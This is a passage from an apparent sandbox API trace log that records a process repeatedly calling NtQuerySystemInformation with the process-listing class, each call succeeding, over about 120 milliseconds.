ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.943] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0229.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.002] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.003] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.010] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.031] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.037] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.045] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 [0230.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe6f0) returned 0x0 